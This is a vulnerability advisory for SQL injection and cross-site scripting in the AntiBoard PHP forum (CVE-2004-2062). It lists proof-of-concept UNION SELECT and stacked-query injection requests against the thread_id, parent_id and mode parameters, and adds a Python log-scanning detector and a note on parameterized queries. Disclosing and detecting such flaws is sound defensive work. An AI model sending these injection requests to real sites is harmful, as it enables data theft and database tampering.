AntiBoard SQL Injection and Cross-Site Scripting Vulnerabilities

Vulnerability ID: 1108087
Vulnerability type: Input validation
Published: 2004-07-28
Updated: 2005-10-20
CVE ID: CVE-2004-2062
CNNVD-ID: CNNVD-200412-484
Platform: PHP
CVSS score: 7.5
|Vulnerability Source
https://www.exploit-db.com/exploits/24329
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-484
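|Vulnerability Details
AntiBoard is a PHP-based forum application. It does not sufficiently filter user-submitted parameters, which allows remote attackers to obtain sensitive information or modify the database. The 'antiboard.php' script does not properly filter user input: a remote attacker can inject SQL commands through the 'thread_id' and 'parent_id' fields, altering the intended query logic to modify database contents or obtain sensitive information. In addition, the 'antiboard.php' script does not properly filter HTML code, so an attacker can construct a malicious link and lure a user into visiting it, which can disclose the target user's cookie-based authentication credentials.
|Exploit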
source: http://www.securityfocus.com/bid/10821/info

Multiple vulnerabilities are reported to exist in the application due to insufficient sanitization of user-supplied data. The issues include various instances of SQL injection and a cross-site scripting vulnerability.

AntiBoard versions 0.7.2 and prior are affected by these issues.

/antiboard.php?thread_id=1%20UNION%20ALL%20select%20field%20from%20whatever--&mode=threaded&sort_order=

/antiboard.php?range=all&mode=threaded&thread_id=1&reply=1&parent_id=1%20UNION%20ALL%20select%20field%20from%20whatever--

/antiboard.php?range=all&thread_id=1%20UNION%20ALL%20select%20field%20from%20whatever--&sort_order=ASC&mode=threaded

/antiboard.php?thread_id=1&parent_id=1%20UNION%20ALL%20select%20field%20from%20whatever--&mode=nested&reply=1

poster_name=1111&poster_email=1111&message_title=1111&message_body=1111&submit=Submit%2bmessage&thread_id=3&mode=1';%20exec%20whatever--&range=&parent_id=0&reply=reply

POST antiboard.php poster_name=1111&poster_email=1111&message_title=1111&message_body=1111&submit=Submit%2bmessage&thread_id=3&mode=threaded&range=&parent_id=1%20UNION
ALL select field from antiboard_emails----&reply=reply
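
A detection-side view of the requests above, as an added example that is not part of the original advisory or of AntiBoard: it decodes each request's parameters and flags 'thread_id' or 'parent_id' values that are not plain integers. The sample requests are constructed from the request shapes shown above, and the rule that 'mode' is a short lowercase word is an assumption based on the values "threaded" and "nested".

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory names as SQL injection points; both should be plain integers.
NUMERIC_PARAMS = {"thread_id", "parent_id"}
INT_RE = re.compile(r"\d{1,10}")
# Assumption: 'mode' is a short lowercase word, as in "threaded" and "nested" above.
MODE_RE = re.compile(r"[a-z]{1,16}")

def suspicious_params(target, body=""):
    """Return {name: decoded value} for parameters whose value breaks the expected shape."""
    pairs = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    pairs += parse_qsl(body, keep_blank_values=True)  # form-encoded POST body
    findings = {}
    for name, value in pairs:
        if not value:
            continue  # an empty parameter carries no injected text
        if name in NUMERIC_PARAMS and not INT_RE.fullmatch(value):
            findings[name] = value
        elif name == "mode" and not MODE_RE.fullmatch(value):
            findings[name] = value
    return findings

# Constructed sample requests (method, target, body) modelled on the shapes above.
SAMPLE_REQUESTS = [
    ("GET", "/antiboard.php?thread_id=1&mode=threaded&sort_order=ASC", ""),
    ("GET", "/antiboard.php?thread_id=1%20UNION%20ALL%20select%20field"
            "%20from%20whatever--&mode=threaded&sort_order=", ""),
    ("POST", "/antiboard.php",
     "poster_name=1111&message_body=1111&thread_id=3&mode=threaded&parent_id=0"),
    ("POST", "/antiboard.php",
     "thread_id=3&mode=1';%20exec%20whatever--&parent_id=0&reply=reply"),
]

def scan(requests):
    """Return (index, findings) for every request with a suspicious parameter."""
    hits = []
    for i, (_method, target, body) in enumerate(requests):
        found = suspicious_params(target, body)
        if found:
            hits.append((i, found))
    return hits

if __name__ == "__main__":
    for i, found in scan(SAMPLE_REQUESTS):
        print(SAMPLE_REQUESTS[i][0], SAMPLE_REQUESTS[i][1], "->", found)
```

The same shape check, applied inside the application before the value reaches the query (integer casting or a parameterized statement), is what removes the injection point; log-side detection only shows where it was probed.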
|References

Source: XF
Name: antiboard-get-sql-injection(16828)
Link: http://xforce.iss.net/xforce/xfdb/16828
Source: BID
Name: 10821
Link: http://www.securityfocus.com/bid/10821
Source: SECUNIA
Name: 12137
Link: http://secunia.com/advisories/12137
Source: BUGTRAQ
Name: 20040728 AntiBoard <= 0.7.2 XSS/SQL Injection
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=109105610220965&w=2
Source: NSFOCUS
Name: 6748
Link: http://www.nsfocus.net/vulndb/6748
